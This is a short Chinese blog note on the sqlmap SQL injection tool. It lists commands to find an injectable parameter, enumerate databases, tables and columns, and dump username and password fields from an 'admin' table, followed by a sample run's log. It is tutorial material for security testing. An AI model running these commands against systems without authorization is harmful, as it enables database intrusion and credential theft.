SQL注入检测 SQLMAP

2019-04-03

Mysql, 笔记

https://blog.csdn.net/qq_32502511/article/details/80407253

SQL注入检测 SQLMAP

安装python

sqlmap 的运行环境目前只支持2.x版本

安装SQLMap

官网 http://sqlmap.org/

SQLMap常用命令

　　1. sqlmap.py -u "http://www.XXX.com/index.asp?id=1"    

　　　　判断id参数是否存在注入：结果中包含 “id” is Vulnerable  字段表示存在注入

　　　　存在注入，下面的步骤才可以执行成功~

　　2. sqlmap.py -u "http://www.XXX.com/index.asp?id=1"  --dbs

　　　　列举能列出的所有数据库名

　　3.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --current-db

　　　　列出当前使用的数据库名，假设列出“sqltest”数据库　　

　　4.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1"  --is-dba

　　　　判断该注入点是否有管理员权限：返回true  表示是管理员

　　5.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" --tables

　　　　获取sqltest中的所有表，假设有"admin"表

　　6.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" --columns

　　　　列举表admin的字段（列名），假设存在"username","password"字段

　　7.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" -C "username,password" --dump

　　　　下载字段username，password的值，若询问是否破解md5加密，选择no即可

例如：

I:\sqlmap>sqlmap.py -u "http://xxxx.com/xxx?a=xxxf&b=xxx" -p a --risk 3 --level 3 --dbms=MYSQL --technique=T
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.4.13#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:25:35 /2019-04-03/

[20:25:36] [INFO] testing connection to the target URL
[20:25:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:25:37] [WARNING] heuristic (basic) test shows that GET parameter 'userId' might not be injectable
[20:25:37] [INFO] testing for SQL injection on GET parameter 'userId'
[20:25:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[20:25:38] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[20:25:52] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[20:25:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[20:26:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[20:26:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:26:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[20:26:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:26:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[20:26:21] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[20:26:26] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[20:26:32] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:26:37] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:26:44] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:26:50] [INFO] testing 'MySQL OR time-based blind (ELT)'
[20:26:55] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:27:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:27:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:27:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:27:04] [WARNING] GET parameter 'userId' does not seem to be injectable
[20:27:04] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 20:27:04 /2019-04-03/